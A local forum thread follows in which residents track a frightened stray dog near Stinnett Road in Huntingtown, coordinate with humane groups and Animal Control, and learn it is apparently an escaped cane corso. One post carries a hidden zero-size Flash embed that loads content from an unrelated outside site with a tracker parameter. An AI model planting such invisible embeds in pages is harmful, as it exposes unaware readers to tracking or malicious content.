Wandering Boxer

Around 4:00 pm I saw a dark brindle boxer walking up the shoulder of Rt.4 in Huntingtown. It was walking Northbound on the Southbound shoulder. I turned around to try to get him but couldn't. I was afraid that I was going to run him right into the rush hour traffic. He did have a collar on. I don't know for sure that it was a male.

Just came by Ponds Wood Rd. and there was a car with two Animal Control vans.

Oh good. I called them when I got home hoping it wouldn't be too late. Better for them to get the dog than have it hit by a car. Hope the owner's looking for it (assuming they caught it)

Thanks

Brindle Boxer

I just saw a brindle boxer in my back yard. I live in Huntingtown, off of Stinnett Road. The dog was thin, scared, and was wearing a collar. He/she wouldn't come to me but rather ran off into the woods. Does anyone know of a reported lost boxer?

I put food out in case he comes here again.

Grab him if you can. I know of people that have Boxers in your area but I think the male is a fawn..only seen him once. But let me check with them.

He's off in the woods. He took off like he was terrified. I couldn't even get close to him.

Poor, poor baby.

Just checked with my friend, both of hers are fawn and were safe & sound. Wonder how hard it is to trap a dog

who has a trap big enough? I called Tri-County and no one has reported a missing boxer. The first post in this thread shows the dog being sighted on 9/1. He's got to be starving.

I'll send an email around asking for a trap or for ideas. I think Calvert Humane has a trap large enough. It's worth a shot anyway.

I'll key you in on the email.

I hate to think of this critter hungry and it's getting colder at night.

I think there was an email a while back about the different groups that have a trap that could be borrowed...I know one was from Calvert - not sure if it was CAWL or Calv Humane...I'll try to find the email.
Good luck catching him!

Sally from Calvert Humane sent me an email and recommended that I continue to put food out and to get in touch with Animal Control. Sally tried to catch the dog and so have people from CAWL. No one can get close to the dog.

I'll also look to see if posters are on any nearby telephone poles, etc., regarding a lost dog.

I called Animal Control and they said they'd send an officer around this area to look. They said they wouldn't put out a trap since they've only had one report of a sighting. She said no one else has called re sighting the dog. I'll still put some food down in the woods.

I live in CRE. The house diagonally across the street was a 'heroine house' until just recently... went into foreclosure. Owners had a dark brindle boxer w/ a white blaze chest that sort of dissappeared a while back. I have to wonder if this is the same dog, and they cut him loose when the foreclosure forced them out... ??

Anyway, I hope he comes out of the woods OK!

Poor baby..he is probably hungry and scared to death. Boxers don't do well on their own like that.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://secsportschat.com/?tracker=3759"></param><param name="allowFullScreen" value="true"></param><embed src="http://secsportschat.com/?tracker=3759" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

You are right, boxer depended on their owners...poor thing!

Animal Control just left. They had a report on file of a missing dog fitting this description. The dog got loose from the breeder.

They contacted the breeder of the dog. And, if it's the same dog, it's a cane carso (sp?), female, about 10 mos old. The owner of the dog no longer wanted her and flew her back to the breeder who lives here in Huntingtown. The breeder takes back all their dogs if the new owner no longer wants the dog. Anyway, the dog was back at the breeder's house and got loose. She's been loose for 3-4 weeks.

Animal Control set up a trap and the breeder and I exchanged phone numbers. So, keep your fingers crossed that the dog comes back here looking for food.

I just talked with Christie, ACO, Calvert, just a few minutes ago..and she is out in the area look ing for this dog. It does look like a boxer, but as LuvCats posted, it is a cane corso.
Anyone traveling Emmanual Church road/Stinnet road area, keep a sharp eye out for this dog, and call ACO if you see him.
